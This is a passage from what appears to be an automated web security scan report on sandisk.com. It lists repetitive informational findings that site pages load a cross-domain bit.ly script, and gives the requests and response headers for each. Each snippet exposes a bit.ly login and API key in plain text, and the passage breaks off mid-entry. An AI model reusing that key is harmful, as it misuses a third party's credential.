<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.126. http://www.sandisk.com/consumer-products/computing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /consumer-products/computing/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /consumer-products/computing/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41063
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.127. http://www.sandisk.com/consumer-products/computing/ssd-landing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /consumer-products/computing/ssd-landing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /consumer-products/computing/ssd-landing HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/ssd/landing
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34308
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.128. http://www.sandisk.com/consumer-products/dslr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /consumer-products/dslr

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /consumer-products/dslr HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40829
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.129. http://www.sandisk.com/consumer-products/gaming  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /consumer-products/gaming

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /consumer-products/gaming HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39989
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.130. http://www.sandisk.com/consumer-products/mobile-memory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /consumer-products/mobile-memory

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /consumer-products/mobile-memory HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39931
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.131. http://www.sandisk.com/consumer-products/music-player  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /consumer-products/music-player

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /consumer-products/music-player HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42311
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.132. http://www.sandisk.com/css/MediaPlayer_img/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /css/MediaPlayer_img/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /css/MediaPlayer_img/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12586


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.133. http://www.sandisk.com/flash/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /flash/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flash/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.134. http://www.sandisk.com/global-sites  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /global-sites

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /global-sites HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15922
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.135. http://www.sandisk.com/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /homepage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28452
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.136. http://www.sandisk.com/media/100759/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /media/100759/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/100759/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.137. http://www.sandisk.com/media/100764/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /media/100764/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/100764/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.138. http://www.sandisk.com/media/100769/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /media/100769/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/100769/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.139. http://www.sandisk.com/media/100774/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /media/100774/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/100774/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.140. http://www.sandisk.com/media/27670/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /media/27670/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/27670/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.141. http://www.sandisk.com/media/27675/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /media/27675/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/27675/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.142. http://www.sandisk.com/media/27685/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /media/27685/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/27685/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.143. http://www.sandisk.com/media/27690/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /media/27690/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/27690/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.144. http://www.sandisk.com/media/27695/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /media/27695/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/27695/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.145. http://www.sandisk.com/media/407994/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /media/407994/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/407994/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.146. http://www.sandisk.com/media/745047/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /media/745047/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/745047/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.147. http://www.sandisk.com/misc/404error  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /misc/404error

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /misc/404error HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world...s-smallest-64gb-solid-state-drive
